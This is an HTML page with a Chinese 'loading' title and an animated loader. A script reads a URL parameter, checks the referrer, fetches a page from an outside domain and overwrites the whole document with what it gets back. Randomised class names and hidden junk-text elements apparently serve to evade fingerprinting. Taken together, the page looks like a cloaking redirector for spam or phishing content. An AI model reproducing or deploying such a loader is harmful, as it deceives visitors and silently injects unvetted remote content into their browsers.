<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .IH8XLs {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .IH8XLs .o9c90Ti {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .IH8XLs .content {
            line-height: 50px;
            text-align: center
        }

        .IH8XLs .img {
            width: 100%
        }

        .IH8XLs .kusNrr {
            text-align: center
        }

        .IH8XLs .kusNrr span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .IH8XLs .kusNrr span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .IH8XLs .kusNrr span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .IH8XLs .kusNrr span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .IH8XLs .kusNrr span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .IH8XLs .kusNrr span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .IH8XLs .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function ntGMzcvSG2K(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var y9Fdp = ntGMzcvSG2K('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ y9Fdp +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ y9Fdp +".html?a=share";
		}
		
        h4eU9yR13H=url+"#"+new Date().getTime();
        h4eU9yR13H && function() {
            $.get(h4eU9yR13H, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<div style='display:none'>fsyGeGuvohwdYp0</div>
<li style='display:none' >R0svQXxLs87qCvjiwJyGkMqsiILyHBHgNNpBnJcrCzjTDOS5bhB5UXiHIBT6LBt8iPI2H4yCnauJAxHhI4ODqNSXEISnP</li>
<ul style='display:none' >MOLa32OZC5jkmuAvzNEmF1G0ew52Gx5JxhKH8f6JdqTdEq1dbpZYIqgZk8lOZfeZm6PG4LO66XQTPnXK3NJWy7ZTPhLStfJ9rY</ul>
<b style='display:none' >p1AvFubpdJyV2YVzCX34rLLJiKAIWTg898u4gkYxLpdZaf2</b>
<ul style='display:none' >MOLa32OZC5jkmuAvzNEmF1G0ew52Gx5JxhKH8f6JdqTdEq1dbpZYIqgZk8lOZfeZm6PG4LO66XQTPnXK3NJWy7ZTPhLStfJ9rY</ul>
<span style='display:none'>cic7frbt4MlfXVQrEV7DviOBNlITbvQVjSsszKAR5QY3olzDt9S1uywPfy5npWmVujWtvzpnJGkFaRsq</span>
<li style='display:none' >R0svQXxLs87qCvjiwJyGkMqsiILyHBHgNNpBnJcrCzjTDOS5bhB5UXiHIBT6LBt8iPI2H4yCnauJAxHhI4ODqNSXEISnP</li>
<span style='display:none'>cic7frbt4MlfXVQrEV7DviOBNlITbvQVjSsszKAR5QY3olzDt9S1uywPfy5npWmVujWtvzpnJGkFaRsq</span>
<b style='display:none' >p1AvFubpdJyV2YVzCX34rLLJiKAIWTg898u4gkYxLpdZaf2</b><div class="IH8XLs">
    <div class="o9c90Ti">
        <div class="kusNrr">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>ogYHKebvuldLCDQNqwPovV18kyCJXtOhN8eLUH3lxgbz7lotg5UHSTnmsUWSjdg6w40wJvA4WyVnIF5AJ1hwrZxA8Q3AMs</span>
<li style='display:none' >gYnZMmucyRvjTQy0bSrt64NlXjw5y8vBs6GbVgwP7X</li>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>F4MKC6j20fUNmrNTo6ATOCjAObCDnoRTeSvlUwB5dWtdsd18U</a>
<p  style='display:none'>LTv46dUiQ0Wg2CJbfhtWppdXqtbH0KjRwrF2eEpXoHiDUrXPoZ3DQDKjAcutLaANNlERdh7A03t</p>
<div style='display:none'>d72W1e8pkViI</div>
<div style='display:none'>d72W1e8pkViI</div>
<li style='display:none' >gYnZMmucyRvjTQy0bSrt64NlXjw5y8vBs6GbVgwP7X</li>
<p  style='display:none'>LTv46dUiQ0Wg2CJbfhtWppdXqtbH0KjRwrF2eEpXoHiDUrXPoZ3DQDKjAcutLaANNlERdh7A03t</p></body>
</html>